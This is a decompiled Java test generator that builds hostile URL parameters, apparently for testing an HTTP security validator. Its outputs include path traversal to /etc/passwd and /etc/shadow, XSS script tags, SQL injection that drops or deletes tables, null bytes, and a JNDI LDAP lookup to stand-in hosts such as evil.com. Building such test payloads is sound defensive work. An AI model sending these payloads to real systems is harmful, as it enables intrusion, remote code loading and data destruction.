/*
 * Decompiled with CFR 0.152.
 */
package de.cuioss.http.security.generators.url;

import de.cuioss.http.security.data.URLParameter;
import de.cuioss.test.generator.Generators;
import de.cuioss.test.generator.TypedGenerator;

public class AttackURLParameterGenerator
implements TypedGenerator<URLParameter> {
    private final TypedGenerator<Integer> attackTypeGenerator = Generators.integers((int)0, (int)3);
    private final TypedGenerator<Integer> systemPathSelector = Generators.integers((int)1, (int)3);
    private final TypedGenerator<Integer> scriptTagSelector = Generators.integers((int)1, (int)4);
    private final TypedGenerator<Integer> sqlCommandSelector = Generators.integers((int)1, (int)3);
    private final TypedGenerator<Integer> tableNameSelector = Generators.integers((int)1, (int)4);
    private final TypedGenerator<Integer> maliciousDomainSelector = Generators.integers((int)1, (int)3);
    private final TypedGenerator<Integer> protocolSchemeSelector = Generators.integers((int)1, (int)3);
    private final TypedGenerator<Integer> longStringSize = Generators.integers((int)100, (int)200);
    private final TypedGenerator<Integer> attackStringSize = Generators.integers((int)50, (int)200);
    private final TypedGenerator<Integer> veryLongStringSize = Generators.integers((int)500, (int)1000);

    public URLParameter next() {
        int attackType = (Integer)this.attackTypeGenerator.next();
        String name = switch (attackType) {
            case 0 -> this.generateMaliciousParameterName();
            case 1 -> this.generateSpecialCharParameterName();
            case 2 -> this.generateEncodedParameterName();
            case 3 -> this.generateVeryLongParameterName();
            default -> this.generateMaliciousParameterName();
        };
        String value = this.generateAttackValue();
        return new URLParameter(name, value);
    }

    private String generateMaliciousParameterName() {
        int nameType = (Integer)Generators.integers((int)0, (int)7).next();
        return switch (nameType) {
            case 0 -> "";
            case 1 -> "   ";
            case 2 -> "param with spaces";
            case 3 -> "param=equals";
            case 4 -> "param&ampersand";
            case 5 -> "param#hash";
            case 6 -> "param[bracket]";
            case 7 -> "param{brace}";
            default -> "";
        };
    }

    private String generateSpecialCharParameterName() {
        int charType = (Integer)Generators.integers((int)0, (int)4).next();
        return switch (charType) {
            case 0 -> "param|pipe";
            case 1 -> "param/slash";
            case 2 -> "param\\backslash";
            case 3 -> "param?question";
            case 4 -> "param:colon";
            default -> "param|pipe";
        };
    }

    private String generateEncodedParameterName() {
        int encodingType = (Integer)Generators.integers((int)0, (int)2).next();
        return switch (encodingType) {
            case 0 -> "param%20encoded";
            case 1 -> "param%00null";
            case 2 -> "param%2e%2e%2f";
            default -> "param%20encoded";
        };
    }

    private String generateVeryLongParameterName() {
        String prefix = "very_long_parameter_name_";
        int size = (Integer)this.longStringSize.next();
        return prefix + (String)Generators.letterStrings((int)size, (int)(size + 100)).next();
    }

    private String generateAttackValue() {
        int attackType = (Integer)Generators.integers((int)0, (int)8).next();
        return switch (attackType) {
            case 0 -> this.generatePathTraversalAttack();
            case 1 -> this.generateXSSAttack();
            case 2 -> this.generateSQLInjectionAttack();
            case 3 -> this.generateNullByteAttack();
            case 4 -> this.generateJNDIAttack();
            case 5 -> this.generateProtocolAttack();
            case 6 -> this.generateLongStringAttack();
            case 7 -> this.generateVeryLongStringAttack();
            case 8 -> this.generateFilePathAttack();
            default -> this.generateXSSAttack();
        };
    }

    private String generatePathTraversalAttack() {
        int depth = (Integer)Generators.integers((int)2, (int)5).next();
        StringBuilder path = new StringBuilder();
        for (int i = 0; i < depth; ++i) {
            path.append("../");
        }
        path.append(this.generateSystemPath());
        return path.toString();
    }

    private String generateXSSAttack() {
        String tag = this.generateScriptTag();
        int payloadType = (Integer)Generators.integers((int)0, (int)2).next();
        String payload = switch (payloadType) {
            case 0 -> "alert('xss')";
            case 1 -> "alert(1)";
            case 2 -> "prompt(1)";
            default -> "alert(1)";
        };
        return "<" + tag + ">" + payload + "</" + tag + ">";
    }

    private String generateSQLInjectionAttack() {
        String command = this.generateSQLCommand();
        String table = this.generateTableName();
        return "'; " + command + " " + table + "; --";
    }

    private String generateNullByteAttack() {
        int nullByteType = (Integer)Generators.integers((int)0, (int)1).next();
        return switch (nullByteType) {
            case 0 -> "%00";
            case 1 -> "\u0000";
            default -> "%00";
        };
    }

    private String generateJNDIAttack() {
        String domain = this.generateMaliciousDomain();
        return "${jndi:ldap://" + domain + "/}";
    }

    private String generateProtocolAttack() {
        String protocol;
        String payload = switch (protocol = this.generateProtocolScheme()) {
            case "javascript" -> "alert(1)";
            case "file" -> "///etc/passwd";
            case "data" -> "text/html,<script>alert(1)</script>";
            default -> "alert(1)";
        };
        return protocol + ":" + payload;
    }

    private String generateLongStringAttack() {
        int size = (Integer)this.attackStringSize.next();
        return (String)Generators.strings((String)"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", (int)size, (int)(size + 150)).next();
    }

    private String generateVeryLongStringAttack() {
        int size = (Integer)this.veryLongStringSize.next();
        return (String)Generators.strings((String)"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", (int)size, (int)(size + 500)).next();
    }

    private String generateFilePathAttack() {
        int pathType = (Integer)Generators.integers((int)0, (int)2).next();
        return switch (pathType) {
            case 0 -> "../../../root";
            case 1 -> "..\\..\\windows\\system32";
            case 2 -> "/etc/shadow";
            default -> "../../../root";
        };
    }

    private String generateSystemPath() {
        return switch ((Integer)this.systemPathSelector.next()) {
            case 1 -> "etc/passwd";
            case 2 -> "windows/win.ini";
            case 3 -> "root";
            default -> "etc/passwd";
        };
    }

    private String generateScriptTag() {
        return switch ((Integer)this.scriptTagSelector.next()) {
            case 1 -> "script";
            case 2 -> "img";
            case 3 -> "iframe";
            case 4 -> "style";
            default -> "script";
        };
    }

    private String generateSQLCommand() {
        return switch ((Integer)this.sqlCommandSelector.next()) {
            case 1 -> "DROP TABLE";
            case 2 -> "DELETE FROM";
            case 3 -> "INSERT INTO";
            default -> "DROP TABLE";
        };
    }

    private String generateTableName() {
        return switch ((Integer)this.tableNameSelector.next()) {
            case 1 -> "users";
            case 2 -> "admin";
            case 3 -> "accounts";
            case 4 -> "sessions";
            default -> "users";
        };
    }

    private String generateMaliciousDomain() {
        String domain = switch ((Integer)this.maliciousDomainSelector.next()) {
            case 1 -> "evil";
            case 2 -> "attacker";
            case 3 -> "malicious";
            default -> "evil";
        };
        String tld = switch ((Integer)Generators.integers((int)1, (int)3).next()) {
            case 1 -> "com";
            case 2 -> "net";
            case 3 -> "org";
            default -> "com";
        };
        return domain + "." + tld;
    }

    private String generateProtocolScheme() {
        return switch ((Integer)this.protocolSchemeSelector.next()) {
            case 1 -> "javascript";
            case 2 -> "file";
            case 3 -> "data";
            default -> "javascript";
        };
    }

    public Class<URLParameter> getType() {
        return URLParameter.class;
    }
}

